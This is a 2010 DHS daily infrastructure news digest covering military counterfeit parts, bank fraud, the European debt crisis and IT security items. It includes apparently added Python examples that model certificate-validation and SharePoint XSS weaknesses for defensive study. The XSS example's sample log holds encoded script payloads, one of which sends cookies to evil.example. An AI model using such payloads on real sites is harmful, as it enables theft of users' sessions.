Department of Homeland Security Daily Open Source Infrastructure Report

Monday, May 3, 2010

Complete DHS Daily Report for May 3, 2010

Daily Report

Top Stories

 According to Reuters, the Government Accountability Office said on April 29 that the U.S. Defense Department lacks sufficient quality-controls to prevent substandard parts from ending up in its weapons and other hardware. It recommended the department step up its efforts to establish anti-counterfeiting guidelines for all Defense Department components and defense contractors. (See item 21)

21. April 29, Reuters – (National) Report says U.S. military vulnerable to bad parts. The U.S. Defense Department lacks sufficient quality-controls to prevent substandard parts from ending up in its weapons and other hardware, U.S. congressional auditors said on Thursday. “Existing procurement and quality-control practices used to identify deficient parts are limited in their ability to prevent and detect counterfeit parts in DoD’s supply chain,” the Government Accountability Office said in its report. It cited as an example what it described as substandard Global Positioning System oscillators used for navigation on more than 4,000 Air Force and Navy systems. Also cited were substandard titanium used in fighter jet engine mounts; brake shoes made from ersatz materials, including seaweed; and electronics from a personal computer repackaged and labeled as a $7,000 military-grade circuit for a missile guidance system. It said counterfeit parts had the potential to cause a serious risk to military supply chains, delay wartime missions and impair weapon systems. GAO, Congress’s audit and investigative arm, said the Defense Department draws from a complex network of global suppliers and manages more than four million different parts at a cost of more than $94 billion. It recommended the department step up its efforts to establish anti-counterfeiting guidelines for all Defense Department components and defense contractors. Source:

 The Associated Press reports that a Dallas man describing himself as a terrorist threatened to kill the U.S. President and “every employee of the federal government” in a March 21 online posting because he was upset about health care reform, according to a criminal complaint. (See item 59)

59. April 29, Associated Press – (National) Texas ‘terrorist’ posts death threat against Obama. A Dallas man describing himself as a terrorist threatened to kill the U.S. President in an online posting because he was upset about health care reform, according to a criminal complaint. The 43-year-old faces one count of making threats against the president. He made the death threats March 21 on Craigslist under a posting titled “Obama must die.” The posting said he was following through on a promise to become a terrorist if the federal health care bill passed. “I am dedicating my life to the death of Obama and every employee of the federal government,” the posting said. It ended with a call to arms: “This is war. Join me. Or don’t. I don’t care. I’m not laying down anymore.” He said, “Today I become a terrorist.” In a separate post the same night, he essentially dared others to turn him in to the Secret Service. A resident of Arlington, Texas reported the threats to the Secret Service. Agents tracked down the suspect at his Dallas home, where he lives with his mother. Police arrested him and seized his computer. They found no weapons in the residence. Source:


Banking and Finance Sector

23. April 30, Courthouse News Service – (Florida; International) Ponzi allegedly targeted Jamaican-Americans. A man says he lost $2.6 million in a “huge Ponzi scheme named OLINT” that targeted Jamaican-Americans. He claims the scam was so lucrative that one of its operators “used the money to purchase the Shell Oil facility in Jamaica for $80 million.” The plaintiff sued five people and three organizations in Broward County Court: OLINT, USIMO, and Superclubs. The plaintiff claims he and his investors group put $2.6 million in OLINT, through USIMO, which is or was controlled by one of the suspects. A second suspect’s role was to target Jamaican-Americans for alleged “seminars for foreign exchange trading,” and to promise 10 percent monthly returns, the plaintiff says. USIMO was used to collect money for OLINT “in a corporate structure to hide OLINT’s role from U.S., British and Jamaican authorities,” he adds. He claims the defendants made “huge profits” from the Ponzi scheme, which they “marketed aggressively in Broward County,” including through “feeder clubs.” Source:

24. April 30, BBC – (International) Athens clash at finance ministry over budget cuts. Protesters in Athens clashed with police as a group tried to force its way into the Greek finance ministry. Police fired tear gas to disperse the crowd as the unrest flared over austerity measures that may be taken in return for a massive bailout deal. The European Union (EU) has said it is close to approving the details of an emergency plan to help tackle Greece’s crippling debt. The EU commission chief said “rapid progress” was being made. Police fired tear gas at hundreds of demonstrators, after some tried to break through a police cordon guarding the Greek finance ministry. The outbreaks came after Greece began talks over extra budget cuts as conditions for the bailout loans. These cuts would be in addition to an already mooted austerity drive aimed at reducing the nation’s public deficit, which is more than four times bigger than the EU limit. Source:

25. April 30, BBC – (National) Goldman Sachs ‘facing criminal inquiry’. Goldman Sachs is under criminal investigation for the way in which it sold complex mortgage-backed products to clients, reports suggest. Earlier this month, the US financial regulator brought civil charges against the bank for defrauding investors. It alleged that Goldman failed to disclose a conflict of interest, in that a firm advising it on a product was betting it would decline in value. Goldman denies the accusations and said it was “not surprised” by the reports. “Given the recent focus on the firm, we are not surprised by the report of a [criminal] inquiry. We would fully co-operate with any requests for information,” a Goldman spokesperson said. The investigation is being run from the US Attorney’s office in New York, according to reports. According to the Wall Street Journal, the criminal probe was underway before the civil charges were laid by the Securities and Exchange Commission. Source:

26. April 29, Computerworld – (Utah) IT contractor gets five years for $2M credit union theft. A Provo, Utah computer contractor was sentenced on April 28 to more than five years in prison after pleading guilty to stealing close to $2 million from four credit unions for which he performed IT services. The judge of the U.S. District Court for the District of Utah also ordered the defendant to repay more than $1.8 million in restitution to his victims and to submit to five years of supervised release upon completion of his prison term. In December, the defendant had pleaded guilty to using his privileged computer access to steal money from Family First Federal Credit Union, Alpine Credit Union, Deseret First Credit Union, and First Credit Union. The defendant was employed as a third-party contractor by Open Source Solutions Inc, a computer services firm in Provo. In that capacity, he was supposed to help the four credit unions upgrade their systems. As part of his job, he was given unrestricted local and remote access to the networks at the credit unions. The defendant used his access to initiate several fictitious Automated Clearing House (ACH) transactions, according to court documents describing the thefts at Family First Federal Credit Union. The transfers were deposited into bank accounts that the defendant owned, including a business account that he operated jointly with a business partner. The defendant used fictitious or previously used ACH “racing numbers” to make the deposits into his accounts, court documents said. In all, the defendant admitted to stealing about $1.2 million from Family First, about $82,000 from Alpine, about $635,000 from Deseret First and $93,000 from First Credit. Source:

27. April 29, Associated Press – (California) ‘Starlet Bandit’ robs 2 LA-area banks. The so-called “Starlet Bandit” has struck again. Authorities say the woman robbed two banks on April 29, both in the San Fernando Valley. She is also linked to a heist on April 27 in Granada Hills. The woman is now believed to be responsible for 10 robberies, eight of which occurred in the past week and a half. The woman is believed to be between 20 and 28 years old and weighs between 140 pounds and 170 pounds. Source:

28. April 29, Federal Bureau of Investigation – (National) Ashburn, Virginia man pleads guilty to $53 million bank fraud. A 31-year-old man from Ashburn, Virginia, pleaded guilty on April 29 to operating a fraud scheme that stole more than $53 million from banks throughout the United States. The defendant pled guilty to three counts of bank fraud and one count of money laundering contained in a criminal information filed in the Eastern District of Virginia and an indictment filed in the Northern District of Ohio. Sentencing has been set for July 30, 2010. He faces a maximum penalty of 30 years in prison on each of the bank fraud counts and 10 years in prison on the money laundering count. In a statement of facts filed with his plea agreement, the defendant acknowledged defrauding banks in Virginia, Ohio, Tennessee and Maryland of more than $53 million. To accomplish his fraud, he presented the banks with fraudulent life insurance policies — with purported cash values of millions of dollars — as collateral to obtain the fraudulent loans. The stated purpose of the loans was for various business ventures. To facilitate his scheme, the defendant set up fake domain names and used fake Federal Express mailings and fake e-mails to convince the banks that his collateral was authentic. He used money obtained from his fraud to buy exotic cars and to purchase a multi-million-dollar home in Ashburn, Va. He fled the United States in May 2009 and was later apprehended in Texas in January 2010. Source:

29. April 29, News-Review Today – (Oregon) Oregon Pacific Bank warns public of Internet scam. Oregon Pacific Bank is warning its customers and others of an Internet phishing scam of which it recently became aware. The scam is directed at both Oregon Pacific Bank and non-Oregon Pacific Bank customers, according to a bank news release. An e-mail appearing to be from Oregon Pacific Bank was sent out sometime early Thursday morning, urging the reader to respond and provide confidential information. A link in the e-mail takes the reader to a website that uses the Oregon Pacific Bank logo and images. The reader is asked to provide debit and credit card information and the PIN or password for the account. Oregon Pacific Bank did not send out this e-mail, the release said. Recipients should not open the e-mail and should delete it immediately. According to the release, an outside security firm has investigated and determined that the security, computer systems and data of Oregon Pacific Bank customers have not been breached. Phishing scams, such as this one, are becoming increasingly common, the release said. Source:

30. April 29, Chicago Sun-Times – (Illinois) Double dip bandit hits TCF banks. A man who robbed a bank branch in a Northwest Side Jewel store on April 28 may be responsible for robbing three TCF bank branches a total of six times. It was the second time in the past month the same robber struck at the TCF branch at 6430 W. Irving Park Rd., according to the FBI. The first was March 28, and returning to the scene of the crime has earned him the moniker “Double Dip Bandit.” The suspect is believed to be responsible for six robberies of TCF branches in the area, including two at 1 W. Devon in Park Ridge, three at the Irving Park address, and one at 4734 N. Cumberland in Chicago, the release said. In the April 28 robbery, the suspect — white, 35 to 40, 5-foot-11 to 6-foot-2 with a slight goatee — walked up to the teller in the Jewel, showed a handgun and verbally announced a robbery, an FBI spokeswoman said. There have been at least 56 bank robberies reported in the Chicago area so far in 2010, according to the FBI. Source:

31. April 29, Deseret News – (Utah) Crews investigate white powder scare at Salt Lake City business. Hazmat crews are investigating a white powder found inside an envelope at the Discover Financial Services building, 5420 West 1738 South. There have been no evacuations, and no one has reported any health problems, said a Salt Lake City police detective. An employee discovered the powder after opening an envelope about 11:30 a.m. The situation and the employees were isolated, and no evacuations were necessary, he said. Salt Lake City fire crews decontaminated employees who were exposed to the unknown substance. Tests were being conducted to determine what the substance is. Source:

32. April 29, Associated Press – (New York) Workers march on Wall Street, protest big banks. Thousands of workers and union leaders marched on Wall Street on Thursday to express their anger over lost jobs, the taxpayer-funded bailout of financial institutions and questionable lending practices by big banks. The rally was organized by the AFL-CIO and an association of community groups. It included a diverse mixture of union workers, activists, the unemployed, and homeowners threatened by foreclosure. The protesters, carrying signs saying “Wall Street Overdrafted Our Economy” and “Reclaim America,” rallied at City Hall Park, then marched down to the Merrill Lynch Bull statue demanding good jobs and accountability from banks. Earlier in the day, noisy protesters with signs took over two bank building lobbies on Manhattan’s Park Avenue in a prelude to the rally. More than 100 people entered a midtown building housing JPMorgan Chase offices. They handed a bank executive a letter requesting a meeting with the CEO, and chanted “Bust up! Big banks!” and “People power!” A half-hour later, they were calmly escorted outside by officers. They then walked a few blocks up the avenue and crowded into the lobby of the Seagram Building, where Wells Fargo and Wachovia, the bank it merged with in 2008, have offices. The protesters held up signs reading, “Save Our Jobs” and “Save Our Homes.” Police arrived on horseback. Source:

33. April 28, Tribune Washington Bureau – (International) Europe’s widening financial crisis threatens to put damper on U.S., global recovery. Just as the American economy was gathering steam — with consumers starting to spend more and the housing market showing signs of stabilizing — a widening financial crisis in Europe is threatening to put a damper on the recovery both here and abroad. Germany offered a hopeful word on April 28, putting aside months of reluctance and saying it could rush through a plan to foot its share of an International Monetary Fund-European Union bailout for Greece that now looks to exceed $132 billion. But the credit contagion that began in heavily indebted Greece spread to Spain as that much-larger economy’s sovereign rating was downgraded — only one day after Athens’ own bonds were slashed to junk status and Portugal’s debt fell as well. And despite German officials’ pledge to act swiftly, many economists saw a likelihood of damaging fallout from the crisis. A European specialist at the Peterson Institute for International Economics in Washington said he doubts there is enough political will in Germany to back such a hefty bailout plan, and even if it does, the government is likely to face constitutional challenges to taking such measures. U.S. banks have relatively little exposure to debt from Greece and other at-risk EU countries such as Portugal and Spain. But the collateral effects of a financial meltdown in Europe would be damaging to the American and global economies. Source:

Information Technology

67. April 30, Help Net Security – (International) Low confidence in virtual environment security. There is a significant gap between the speed at which companies are willing to deploy virtualization and their security readiness to address the added complexity that any new technology introduces, according to a Prism Microsystems survey of over 300 IT managers, security personnel, auditors, and administrators. The results of the survey indicate that companies are largely ignoring hypervisor-level security despite acknowledging the importance of monitoring the virtualization layer for risk mitigation. At the hypervisor layer, only 29% are collecting logs, 17% are reporting on activities and controls, 23% are monitoring user activity, and 18% are tracking access to critical data and assets. Other best practices being ignored include separation of duties, with over 65% indicating that they have not implemented separation of duties between IT personnel responsible for provisioning virtual machines and virtual infrastructure and other administrator groups. This raises the risk of abuse by privileged insiders, a concern that is shared by over a third of respondents. A majority of respondents to the survey agree that traditional security products and solutions are insufficient to provide visibility into the virtual environment, yet they continue to use these solutions, citing lack of budget as a primary inhibitor. This implies that in the rush to adopt virtualization, security investments are not being factored into project budgets. Source:

68. April 30, ZDNet Asia – (International) Easy-to-get Web certs undermine online trust. “Get ready a credit card and a free Web mail account that is registered as ‘ssladmin.’ Go to a certificate authority (CA), such as VeriSign’s RapidSSL. Now, register online for a secure Web certificate for a domain that may not necessarily be owned by the registrant.” This simple process of attaining a legitimate Web security certificate is a security flaw made known and described in detail by a security expert in a March report on blog site Betanews. It is not a new security concern, either, according to a strategic solutions consultant at RSA, the security division of EMC. In an e-mail interview with ZDNet Asia, he said this is a “well-recognized problem” that security practitioners have known for a “fairly long time”. “The commercial pressures [faced by CAs] led some of these companies to introduce ‘domain validated (DV) only’ SSL certificates, for which minimal verification is made of the details in the certificate,” the consultant elaborated. Another industry player gave further insight into the CA industry. Source:
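The weakness described in item 68 is easier to reason about as a model of the two parties involved. The following is an added example, not code from the ZDNet Asia article, from RapidSSL or from any webmail provider. It assumes a DV CA proves control of a domain by e-mailing a challenge to one of a short list of administrative mailboxes at that domain; the conventional list (admin, administrator, hostmaster, postmaster, webmaster), the domain webmail.example and the actor names are illustrative, and only the extra “ssladmin” mailbox comes from the article. The vulnerable scenario shows why a free-webmail domain is exposed; the hardened one shows the two fixes a practitioner would expect (the provider reserves the administrative local-parts, the CA narrows its list).

```python
"""Model of the domain-validated (DV) issuance weakness: whoever can read the
mailbox the CA mails its challenge to is treated as the domain's controller.
Added illustration; the conventional mailbox list, the domain and the names are
assumptions, not taken from the article."""
from __future__ import annotations
from dataclasses import dataclass, field

CONVENTIONAL_VALIDATION_LOCALPARTS = frozenset(
    {"admin", "administrator", "hostmaster", "postmaster", "webmaster"}
)


@dataclass
class MailProvider:
    """A mail domain that hands mailboxes to whoever asks first (free webmail),
    except for local-parts on its reserved list."""
    domain: str
    reserved: frozenset = frozenset()
    mailboxes: dict = field(default_factory=dict)   # local-part -> owner

    def register(self, localpart: str, owner: str) -> str:
        lp = localpart.lower()
        if lp in self.reserved:
            raise PermissionError(f"{lp}@{self.domain} is reserved for the operator")
        if lp in self.mailboxes:
            raise ValueError(f"{lp}@{self.domain} is already taken")
        self.mailboxes[lp] = owner
        return f"{lp}@{self.domain}"

    def reader_of(self, localpart: str) -> str | None:
        """Who actually receives mail sent to this local-part (None: nobody)."""
        return self.mailboxes.get(localpart.lower())


@dataclass
class CertificateAuthority:
    """A DV CA: it e-mails a one-time challenge only to an approved local-part at
    the requested domain and treats whoever reads that mailbox as the controller."""
    approved_localparts: frozenset

    def dv_challenge_reaches(self, domain: str, chosen_address: str,
                             provider: MailProvider) -> str | None:
        localpart, _, addr_domain = chosen_address.rpartition("@")
        if addr_domain.lower() != domain.lower():
            return None                 # challenge must go to the requested domain
        if localpart.lower() not in self.approved_localparts:
            return None                 # not an approved proof-of-control mailbox
        if provider.domain.lower() != domain.lower():
            return None                 # model simplification: one provider per domain
        # Whoever reads this mailbox can echo the token back and receive the cert.
        return provider.reader_of(localpart)


def vulnerable_scenario() -> str | None:
    """Free webmail with no reserved names, CA that accepts 'ssladmin'.
    Returns the party the CA would end up issuing the certificate to."""
    webmail = MailProvider(domain="webmail.example")
    ca = CertificateAuthority(CONVENTIONAL_VALIDATION_LOCALPARTS | {"ssladmin"})
    webmail.register("ssladmin", owner="attacker")      # nothing stops this
    return ca.dv_challenge_reaches("webmail.example",
                                   "ssladmin@webmail.example", webmail)


def hardened_scenario() -> tuple[bool, str | None]:
    """Provider reserves the administrative local-parts and the CA drops
    'ssladmin'. Returns (attacker could register, who the cert would go to)."""
    webmail = MailProvider(domain="webmail.example",
                           reserved=CONVENTIONAL_VALIDATION_LOCALPARTS | {"ssladmin"})
    ca = CertificateAuthority(CONVENTIONAL_VALIDATION_LOCALPARTS)
    try:
        webmail.register("ssladmin", owner="attacker")
        could_register = True
    except PermissionError:
        could_register = False
    return could_register, ca.dv_challenge_reaches("webmail.example",
                                                   "ssladmin@webmail.example", webmail)


if __name__ == "__main__":
    print("vulnerable: certificate goes to", vulnerable_scenario())
    print("hardened:   (attacker registered, certificate goes to) =", hardened_scenario())
```

The point the model makes explicit is that a DV check is a check on mailbox ownership, not on domain ownership; either side alone (a provider that reserves the names, or a CA that refuses unusual ones) closes this particular path, but a relying party still cannot tell from a DV certificate which check was actually performed.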

69. April 29, ComputerWorld – (International) Google patches Chrome for second time this month. Google Inc. patched three vulnerabilities in the Windows version of Chrome recently, marking the second time that it has plugged security holes in the browser in April. The April 27 update to Chrome fixed three flaws rated “high,” the second-most-severe threat ranking in Google’s four-step system. Danish vulnerability tracker Secunia rated the update as “highly critical” under its own severity ranking. As is Google’s practice, technical details of the vulnerabilities were hidden from public view, a tactic the company uses to prevent attackers from accessing the information until the majority of users have updated to the new version. Researchers credited with reporting two of the flaws were awarded bonuses as part of Google’s bug bounty program, which kicked off in January. Most flaws earn their finders $500, but a researcher was handed $1,000 for the cross-origin bypass vulnerability he found in Chrome’s handling of Google URL, a code library used to parse large numbers of Web addresses. Source:

70. April 29, The Register – (International) Microsoft SharePoint bug exposes credentials, sensitive data. Microsoft says it is investigating a security flaw in older versions of its SharePoint Server product that an independent researcher says can easily expose sensitive data and user authentication credentials. The cross-site scripting (XSS) vulnerability has been confirmed in SharePoint Server 2007 and is likely also present in earlier versions of the content management system software, an advisory from High-Tech Bridge warned. It allows adversaries to inject malicious JavaScript into the application by appending commands to the address of the targeted system. “The vulnerability exists due to failure in the ‘/_layouts/help.aspx’ script to properly sanitize user-supplied input in ‘cid0’ variable,” the advisory states. “Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.” A Microsoft spokeswoman said on April 29 that researchers are in the process of drafting a security advisory that includes mitigation and workaround details. With 17 days’ notice, it is unclear why Redmond’s security team did not already have that information ready to go. Source:
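The advisory in item 70 describes the classic reflected cross-site scripting shape: a URL parameter echoed into a page without output encoding. The following is an added example, not SharePoint code and not the High-Tech Bridge advisory. It models that pattern alongside the hardened handling, and adds the check a defender would want while waiting for a vendor fix: a pass over web server logs for requests to the affected script whose parameter carries markup. The page template, the allowed form of a help-topic identifier, the log format and the log lines are constructed; only the path /_layouts/help.aspx and the parameter name cid0 come from the advisory.

```python
"""Reflected XSS model and log check. Added illustration: the page template,
topic-id rule, log format and sample lines are constructed; only the path
'/_layouts/help.aspx' and the parameter name 'cid0' come from the advisory."""
from __future__ import annotations
import html
import re
from urllib.parse import parse_qs, unquote_plus

PAGE = "<html><body><h1>Help topic: {cid0}</h1></body></html>"
TAG = re.compile(r"<[A-Za-z/]")
BASE_TAG_COUNT = len(TAG.findall(PAGE))          # tags the template itself contains
TOPIC_ID = re.compile(r"[A-Za-z0-9_.-]{1,64}")   # plausible help-topic id (assumption)
SCRIPT_MARKERS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=|<\s*iframe", re.I)


def render_help_vulnerable(cid0: str) -> str:
    """Echoes the raw parameter: any markup in it becomes part of the page."""
    return PAGE.format(cid0=cid0)


def render_help_hardened(cid0: str) -> str:
    """Two independent controls: reject values that are not a plausible topic
    id, and HTML-encode whatever is rendered even after the check passes."""
    if not TOPIC_ID.fullmatch(cid0):
        cid0 = "unknown"
    return PAGE.format(cid0=html.escape(cid0, quote=True))


def injected_tag_count(page: str) -> int:
    """Number of HTML tags in the page beyond those the template contributes."""
    return len(TAG.findall(page)) - BASE_TAG_COUNT


# Constructed W3C-style web server log lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2010-04-29 10:02:11 10.0.0.5 GET /_layouts/help.aspx cid0=MS.WSS.manifest 200
2010-04-29 10:02:19 10.0.0.5 GET /_layouts/help.aspx cid0=%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E 200
2010-04-29 10:03:40 10.0.0.9 GET /default.aspx - 200
2010-04-29 10:04:02 10.0.0.7 GET /_layouts/help.aspx cid0=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 200
"""


def flag_suspicious_requests(log_text: str) -> list[tuple[str, str, str]]:
    """Return (time, client ip, decoded cid0) for help.aspx requests whose
    cid0 fails the topic-id rule and carries script-like markup."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, time, ip, _method, stem, query, _status = fields[:7]
        if stem.lower() != "/_layouts/help.aspx" or query == "-":
            continue
        for value in parse_qs(query, keep_blank_values=True).get("cid0", []):
            decoded = unquote_plus(value)   # second pass catches double-encoded payloads
            if not TOPIC_ID.fullmatch(decoded) and SCRIPT_MARKERS.search(decoded):
                hits.append((time, ip, decoded))
    return hits


if __name__ == "__main__":
    probe = '"><script>alert(1)</script>'
    print("vulnerable page gained", injected_tag_count(render_help_vulnerable(probe)), "tags")
    print("hardened page gained", injected_tag_count(render_help_hardened(probe)), "tags")
    for hit in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

Output encoding is the control that actually closes the hole; the identifier allow-list is defence in depth, and the log check is a compensating detection, not a fix. Real web server logs also record the status code and user agent, which help separate scanners from a campaign aimed at a specific user population.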

71. April 29, DarkReading – (International) Researchers lock down the hypervisor. Researchers at North Carolina State University have come up with a tool that aims to eliminate one of the biggest risks to virtualization and cloud computing: attacks on the hypervisor. The so-called HyperSafe prototype blocks any new code — think malware — from getting into the hypervisor and restricts alterations to the hypervisor’s code. The NC State research, funded by the U.S. Army Research Office and the National Science Foundation, focused on using features in the underlying hardware to help armor the hypervisor against attacks. The assistant professor of computer science at NC State who heads the research team that created HyperSafe says the tool is integrated into the hypervisor itself, and that the research team used it on the Xen and BitVisor hypervisors. “Existing hypervisors, such as Xen and BitVisor, need to be modified or extended to include HyperSafe...which enables the hypervisor with self-protection from code-injection attempts,” the assistant professor said. HyperSafe would theoretically block threats such as Blue Pill and Vitriol — hypervisor rootkits that inject malware into the hypervisor, he says. The tool uses two techniques to secure the hypervisor: nonbypassable memory lockdown and restricted pointer-indexing. Nonbypassable memory lockdown blocks any new code from entering the hypervisor, except for code introduced by the system administrator. So even if malware exploits a buffer overflow bug in the hypervisor, the hypervisor itself can’t be compromised, according to the research. Source:

72. April 29, SC Magazine – (International) Infosecurity Europe: Data integrity attacks described as a future cyber crime threat. In a keynote panel debate at Infosecurity Europe, data integrity attacks have been described as a real problem and as a future cyber crime threat. The director of Quocirca claimed that attacks on data were an area of concern and the problem lay in how to mitigate against the problem. Commenting, a Jericho Forum board member and global vice president of information security at Commerzbank said: “This is a problem for the industry as a whole, and the main concern is systems protecting against it. Much of security is concentrated on confidentiality and it is not concerned about giving the same degree of protection.” Speaking on behalf of the US Cyber Consequences Unit, a spokesman commented that the largest data integrity attack commonly seen was students changing their grades online, but there was an insider threat challenge with disgruntled employees and “that level of crime in the future is what we are worried about.” The vice president of log management at Tripwire said: “If someone changes data and someone impacts a critical component, there are paths that are able to know what is happening but this is something that a human element will not follow and you have to have clear policies on data, and what it should look like. You should be able to look at the data and see how it was changed, it comes down to managing people, processes and technology.” Source:
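The panel in item 72 points at the control an integrity attack calls for: a way to look at the data and see whether, and where, it was changed, that a privileged insider cannot quietly defeat. The following is an added example, not code from the panel or from any vendor named there. It keeps a keyed baseline (HMAC-SHA256 per record) over a set of records and reports which records were modified, added or removed. Because the baseline is keyed, an insider who can rewrite the data but does not hold the key cannot recompute a matching baseline, which is the difference between this and a plain checksum. The grade-book records and the key are constructed for illustration; the grade-change case is the one the panel itself raised.

```python
"""Keyed integrity baseline over a record set. Added illustration; the records,
the key and the tampering scenario are constructed."""
from __future__ import annotations
import hashlib
import hmac
import json


def canonical(record: dict) -> bytes:
    """Stable serialisation so field order cannot change a record's digest."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def baseline(records: dict[str, dict], key: bytes) -> dict[str, str]:
    """Map record id -> HMAC-SHA256 of the canonical record under `key`."""
    return {rid: hmac.new(key, canonical(rec), hashlib.sha256).hexdigest()
            for rid, rec in records.items()}


def verify(records: dict[str, dict], base: dict[str, str],
           key: bytes) -> dict[str, list[str]]:
    """Compare current records with a baseline; return ids grouped as
    'modified', 'added' and 'removed' (each list sorted)."""
    current = baseline(records, key)
    report: dict[str, list[str]] = {"modified": [], "added": [], "removed": []}
    for rid in sorted(set(current) | set(base)):
        if rid not in base:
            report["added"].append(rid)
        elif rid not in current:
            report["removed"].append(rid)
        elif not hmac.compare_digest(current[rid], base[rid]):
            report["modified"].append(rid)
    return report


# Constructed sample data: a grade book, the integrity target the panel mentioned.
KEY = b"constructed-demo-key-keep-it-off-the-data-server"
GRADES_AT_BASELINE = {
    "s1001": {"student": "A. Example", "course": "CS101", "grade": "C"},
    "s1002": {"student": "B. Example", "course": "CS101", "grade": "A"},
    "s1003": {"student": "C. Example", "course": "CS101", "grade": "B"},
}


def _copy(records: dict) -> dict:
    return json.loads(json.dumps(records))


def demo_tampering() -> dict[str, list[str]]:
    """One grade raised, one record deleted, one record invented."""
    base = baseline(GRADES_AT_BASELINE, KEY)
    tampered = _copy(GRADES_AT_BASELINE)
    tampered["s1001"]["grade"] = "A"
    del tampered["s1003"]
    tampered["s1004"] = {"student": "D. Example", "course": "CS101", "grade": "A"}
    return verify(tampered, base, KEY)


def demo_forged_baseline() -> list[str]:
    """An insider changes a grade and rewrites the baseline with an unkeyed
    SHA-256 so it 'matches' the new data. Without the key, every record now
    fails the keyed check, which is itself the signal that the baseline was
    replaced rather than one record edited."""
    tampered = _copy(GRADES_AT_BASELINE)
    tampered["s1001"]["grade"] = "A"
    forged = {rid: hashlib.sha256(canonical(rec)).hexdigest()
              for rid, rec in tampered.items()}
    return verify(tampered, forged, KEY)["modified"]


if __name__ == "__main__":
    print("tampering report:", demo_tampering())
    print("records failing under a forged baseline:", demo_forged_baseline())
```

The design choice worth noting is where the key lives: the verifier holds it, the database host does not, so the set of people who can alter a grade and the set who can bless the alteration are different people. That is the separation-of-duties answer to the insider case the panel describes; a wholesale verification failure, as in the forged-baseline demo, should page someone rather than be treated as noise.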

Communications Sector

73. April 28, Congress Daily – (National) Questions prompt strong defense of broadband program. A Democrat on the Senate Small Business Committee raised concerns on Tuesday that federal regulators are wasting taxpayer dollars by funding duplicative broadband infrastructure projects as part of the $7.2 billion broadband stimulus program. A New Hampshire senator also pressed the heads of agencies within the Agriculture and Commerce departments on whether their awarding of grants to bring high-speed Internet service to certain parts of the country may have driven up commercial broadband deployment costs in some markets. An assistant commerce secretary who directs the National Telecommunications and Information Administration, responded by saying any claims that duplication exists are “not serious objections.” The assistant commerce secretary said his agency uses data on broadband penetration and speeds when choosing where to allot money, arguing that the need for broadband spending may not be apparent in certain areas where consumers have strong Internet connections in their homes but anchor institutions, including hospitals and schools, continue to lack the necessary infrastructure. Source: